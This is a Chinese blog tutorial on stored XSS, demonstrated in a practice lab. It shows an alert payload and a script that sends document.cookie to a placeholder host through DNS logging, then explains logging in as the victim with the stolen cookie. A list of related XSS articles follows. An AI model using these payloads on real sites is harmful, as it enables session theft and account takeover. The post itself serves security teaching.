Web渗透测试之XSS攻击:存储型XSS

最新推荐文章于 2024-08-16 18:08:04 发布
最新推荐文章于 2024-08-16 18:08:04 发布
阅读量2k 收藏 6
点赞数
分类专栏: XSS 文章标签: 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vodkaDL/article/details/111464862
版权

文章目录

前言

  在了解了反射型XSS相关方面的内容之后,本篇我们将继续深入了解存储型XSS,笔者将通过具体的例子讲解存储型XSS攻击的具体流程与危害。

存储型XSS

  在之前的博客中我们提到过,存储型XSS是被包含在之后的HTTP请求响应中的,并且由于存储型XSS是伴随于留言评论等功能存在的,因此存储型XSS能够跟随留言内容一同被存入服务器,并且可以持续发挥作用。我们先来看一个简单的存储型XSS的例子。

最简单的存储型XSS

  我们先在靶场题目提供的评论栏中写入一个最简单的XSS:< script>alert(1)< /script>:
在评论栏中写入XSS
提交后再次访问该页面发现有弹窗且弹窗内容为1,表明我们写入的XSS已经随评论一起被存进服务器:
提交留言后再次访问该页面
接着查看网页源码:
查看网页源码
可以看到我们写入的XSS已经被嵌入到网页中,之后只要有用户浏览该网页就会触发我们写入的XSS。

利用存储型XSS获得cookie

  原理与上篇反射型XSS中用到的类似,都是借助DNSlog的方式来获得cookie。在评论框写入如下脚本:
< script src=“http://xxx/”+document.cookie>< /script>
  当该脚本成功嵌入网页源码中时就会触发浏览器执行该XSS,而我们只需查看DNS日志即可获得受害用户的cookie,接着抓包后将cookie替换为受害用户的cookie即可登录受害用户的账号。

总结

  与反射型XSS不同,由于存储型XSS可以随评论等一同存入服务器,因此可以被持续触发利用。而在获得cookie这块二者原理大致相当,都是将cookie拼接到受攻击者控制的域名中,然后通过查看DNS日志的方式获得cookie,最后修改请求包中的cookie达到冒充受害用户的目的。

VodkaDL
关注
专栏目录
web安全渗透测试十大常规项(二):web渗透测试XSS跨站脚本攻击
HACKONE的博客
05-26 342
渗透测试XSS跨站脚本攻击XSS跨站脚本攻击 XSS跨站脚本攻击
Web安全测试(五):XSS攻击存储XSS漏洞
ml202187的博客
09-04 2249
结合内部资料,与安全渗透部门同事合力整理的安全测试相关资料教程,全方位涵盖电商、支付、金融、网络、数据库等领域的安全测试,覆盖Web、APP、中间件、内外网、Linux、Windows多个平台。学完后一定能成为安全大佬!《全栈安全测试教程(0基础)》存储XSS,持久化,代码是存储在服务器中的。
存储xss案例
weixin_45694388的博客
08-15 1364
存储xss原理: 攻击者在页面插入xss代码,服务端将数据存入数据库,当用户访问存在xss漏洞的页面时,服务端从数据库取出数据展示到页面上,导致xss代码执行,达到攻击效果 案例: 在一个搭建的论坛网站中, 根据存储xss注入的条件,要找到可以存储到数据库的输入位置,并且这个位置还可以被其他用户查看, 例如在此网站中,我们可以尝试在发帖、评论区、标题、标签,以及个人主页的名称、签名、地址…等位置 帖子中: 发现只有点击xss才会显示弹窗,说明这不是一个存储xss,因为他只能影响到自己 发表后发
基于hadoop构建对象存储系统_对象存储添加Hadoop、OpenStack插件
weixin_39588252的博客
12-18 179
【IT168 资讯】对象存储初创公司Scality将其存储添加到Hadoop,使用户可避免通过Hadoop自己的文件系统加载数据。他们还推出了一款针对Cinder——在OpenStack项目里面的块存储层的插件。RING是基于一组X86服务器节点的对象存储基础架构,存储对象而不是文件或块,而且可以并行操作。Scality提供的一个被称为“生产级Hadoop存储实施”使用了CDMI——由SNIA开发...
XSS-跨站脚本攻击
最新发布
qq_64177395的博客
08-16 1506
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets )的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往web页面里插入恶意script代码,当用户浏览该页时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的1.2 XSS反射也称为非持久,这种类的脚本是最常见的,也是使用最为广泛的一种,主要用于将恶意的脚本附加到URL地址的参数中。
XSS存储攻击
qq_42253044的博客
01-08 952
LOW 服务器端核心代码 <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message inpu...
Web安全原理剖析(十五)——存储XSS攻击
热门推荐
Phantom03167的博客
10-26 1万+
存储XSS攻击
存储 XSS 攻击演示(附链接)
Flag少侠的博客
01-23 1512
存储 XSS 攻击演示(附链接)
Web应用安全:存储XSS.pptx
06-18
存储XSS,全称为存储跨站脚本攻击,是Web应用安全领域中的一种常见威胁。它与反射XSS的主要区别在于,存储XSS的恶意脚本不是通过URL参数传递,而是直接存储在服务器的数据库中,通常在用户交互式的内容区,...
Web应用安全:存储XSS习题(实验习题).docx
06-17
Web应用安全:存储XSS习题(实验习题).docx
奇安信安全扫描漏洞解决路径遍历和存储xss和反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
【网络攻防】“跨站脚本攻击” 第二弹 ——存储XSS
翼安研习社的博客
02-04 1630
撰稿|谢泳 编辑|王聪丽、虞珍妮 信息收集|谢泳 目录1. 前言2. 什么是存储XSS3. 攻击原理4. 防御方式 1. 前言 上一篇介绍了跨域脚本攻击中的“反射XSS”,列举和解释了恶意脚本注入的一些主要方式以及规避方法。事实上,除了直接注入JavaScript之外,还可以通过第三方比如flash、Java applet等进行攻击。 这些第三方工具有自己的运行环境,例如flash中使用ActionScript作为脚本,可以实现丰富灵活的功能,也为XSS提供了可乘之机,所以要避免加载用户自定义..
存储XSS的攻防:不想做开发的黑客不是好黑客
javagty6778的博客
03-11 407
我举个例子吧,当你想在HTML页面上显示一个小于号(
Web渗透测试存储XSS
julielele的博客
06-23 1455
存储XSS,插入">即可发生弹窗。
Web安全基础学习:XSS跨站脚本漏洞之存储XSS
qq_51862722的博客
06-19 1143
存储XSS漏洞:指像留言板、用户名称、日志信息等一些会存储在服务器端的信息,当攻击者在存在存储XSS漏洞的功能点进行注入之后,任何浏览器端加载该信息的时候都会将其中的恶意代码解析,进而触发XSS攻击。该方法甚至可以在管理员审核留言或查看系统信息时触发,进而造成管理员敏感信息的泄露。因为其存储在服务器端,因此造成的危险程度、攻击范围比反射更大更广。留言板、评论区、用户头像、个性签名、登录日志、博客等。
DVWA靶场存储XSS漏洞实验
weixin_44851588的博客
05-26 4839
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 来自菜鸟的一次简单分享,本次实验主要结合后台源代码讲解,梳理存储XSS实验的思路,如果存在问题,请各位大佬多多指导。 一、XSS基础 1.什么是XSSXSS(Cross-site scripting)被称为跨站脚本攻击,由于与层叠样式表的缩写一样,因此被缩写为XSS。 2.XSS漏洞...
CTFHub xss存储 wp
qq_73661602的博客
07-20 973
CTFHub xss存储 wp
实战:存储XSS攻击获取Cookie及防御
qq_43535990的博客
11-06 9078
实战:存储XSS攻击获取Cookie及防御一、存储XSS攻击原理二、搭建测试网站1.phpstudy开启Apache和mysql服务2.搭建数据库3.创建网站文件4.书写代码三、创建xss攻击文件四、上传payload获得用户Cookie 一、存储XSS攻击原理 在讲解存储XSS攻击之前,我们要先明白XSS是个什么东西。 XSS(Cross Site Scripting)跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值